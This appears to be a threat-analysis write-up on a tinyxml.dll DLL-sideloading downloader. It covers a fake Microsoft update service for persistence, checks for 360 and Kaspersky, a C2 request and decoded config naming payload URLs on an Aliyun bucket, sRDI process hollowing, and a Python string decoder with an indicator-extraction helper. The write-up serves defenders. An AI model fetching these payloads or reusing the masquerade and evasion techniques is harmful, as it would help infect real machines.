tinyxml.dll (tinyxml.dll DLL-hijacking downloader)

Published: 2025-12-10 19:18:08



Contents: Basic information; PDB information; DllMain flow; Service creation; 360 and Kaspersky processes detected; Not detected; CreateHollowedProcess called via sRDI (originally dllTools.dll); Second sRDI stage performs the HTTP download, code identical to tinyxml.dll; String obfuscation method; Payload storage server

Basic information

QQExternal.exe loads tinyxml.dll

Forged certificate

PDB information

E:\其它文件\InternetRedirectNew\tinyxmlHook\Release\tinyxml.pdb

DllMain

Flow

Service creation

Service details:
Name: MicrosoftSetupSystemTask
Display name: Microsoft Setup Update System Network Task
Description: Microsoft 安装更新系统任务。请勿阻止或禁用这项服务,否则无法更新系统网络。 (translation: "Microsoft system update installation task. Do not block or disable this service, otherwise the system network cannot be updated.")
Binary path: C:\ProgramData\Microsoft\Setup\QQExternal.exe

360 and Kaspersky processes detected

Sends the HTTP request directly and moves on to the next stage.
HTTP request:
http://[www.proxyconsole.com->ip]:8250/api.php?act=get_run_core&app=10001
(http://www.proxyconsole.com:8250/api.php?act=get_run_core&app=10001)
Response


After base64 decoding:

    {
        "FirstSelect": 2,
        "CoreFile": [{
            "Type": 1,
            "Enable": true,
            "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/PuppetLib.dll",
            "Hash": "567376A02E00A595874F5776784E238D"
        }, {
            "Type": 2,
            "Enable": true,
            "Name": "QQExternal.exe",
            "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/QQExternal.exe",
            "Hash": "A8253A842C0AD6C406D0770C1483B90D",
            "RelyOnName": "ChangToAviDllQmeWeb.dll",
            "RelyOnAddress": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/ChangToAviDllQmeWeb.dll",
            "RelyOnHash": "70E6018CA089BF7B03AADEC149D986FD"
        }, {
            "Type": 3,
            "Enable": true,
            "Name": "Dis.exe",
            "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/Dis.exe",
            "Hash": "7C477B3785EC1980014B6CADD4C60C08",
            "CommandLine": "GoGoGo"
        }]
    }
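For triage, the decoded reply is easiest to handle with a small parser that pulls every download URL and MD5 out of the config, including the RelyOn* dependency DLL nested inside the Type-2 entry. The following is an added example (not code from the original post or from the malware); it rebuilds the config above from the fields shown, base64-encodes it as a stand-in for the server reply, and also checks a retrieved file against the 32-hex-digit Hash value the config carries.

```python
import base64
import hashlib
import json

# Constructed stand-in for the get_run_core reply: plaintext JSON built from the
# entries in the decoded response above, then base64-encoded like the server does.
_PLAINTEXT_CONFIG = json.dumps({
    "FirstSelect": 2,
    "CoreFile": [
        {"Type": 1, "Enable": True,
         "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/PuppetLib.dll",
         "Hash": "567376A02E00A595874F5776784E238D"},
        {"Type": 2, "Enable": True, "Name": "QQExternal.exe",
         "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/QQExternal.exe",
         "Hash": "A8253A842C0AD6C406D0770C1483B90D",
         "RelyOnName": "ChangToAviDllQmeWeb.dll",
         "RelyOnAddress": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/ChangToAviDllQmeWeb.dll",
         "RelyOnHash": "70E6018CA089BF7B03AADEC149D986FD"},
        {"Type": 3, "Enable": True, "Name": "Dis.exe",
         "Address": "https://pro-res1.oss-cn-hangzhou.aliyuncs.com/Run/Dis.exe",
         "Hash": "7C477B3785EC1980014B6CADD4C60C08", "CommandLine": "GoGoGo"},
    ],
})
SAMPLE_RESPONSE = base64.b64encode(_PLAINTEXT_CONFIG.encode()).decode()


def extract_iocs(b64_response: str) -> list:
    """Decode a reply and list every (name, url, md5) it references.
    A Type-2 entry also carries a RelyOn* dependency, emitted as its own row.
    Entries with no Name field (Type 1) take the file name from the URL."""
    cfg = json.loads(base64.b64decode(b64_response))
    iocs = []
    for entry in cfg.get("CoreFile", []):
        name = entry.get("Name") or entry["Address"].rsplit("/", 1)[-1]
        iocs.append({"name": name, "url": entry["Address"],
                     "md5": entry["Hash"].lower(), "type": entry["Type"],
                     "enabled": bool(entry.get("Enable")),
                     "cmdline": entry.get("CommandLine")})
        if "RelyOnAddress" in entry:
            iocs.append({"name": entry["RelyOnName"], "url": entry["RelyOnAddress"],
                         "md5": entry["RelyOnHash"].lower(), "type": entry["Type"],
                         "enabled": bool(entry.get("Enable")), "cmdline": None})
    return iocs


def md5_matches(data: bytes, expected_md5: str) -> bool:
    """Compare a retrieved file with the Hash field (32 hex digits, MD5 length)."""
    return hashlib.md5(data).hexdigest() == expected_md5.lower()
```

The extracted rows can go straight into a blocklist or a hunting query for the OSS bucket URLs; sample files should be compared with md5_matches before being tied to a hash from the config.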

Not detected

CreateHollowedProcess is called via sRDI (originally dllTools.dll)

The second sRDI stage performs the HTTP download; its code is identical to that in tinyxml.dll

JSON library information appears in the PE loaded by the second sRDI stage:
E:\其它文件\InternetRedirectNew\Puppet

String obfuscation method

This is a very recognisable "C++ compile-time string encryption" scheme; it was discussed abroad a long time ago: c++ – Compile-time string encryption – Stack Overflow

    import struct

    def xorfunc(buf: bytes, count: int, xorx, xory):
        # Decode `count` bytes: subtract the constant y from each byte,
        # mask to 8 bits, then XOR with the constant x.
        ret = b''
        x, y = tuple(struct.pack('<2B', xorx, xory))
        for i in range(count):
            ret += struct.pack('<B', x ^ ((buf[i] - y) & 0xff))
        return ret

Payload storage server

https://pro-res1.oss-cn-hangzhou.aliyuncs.com
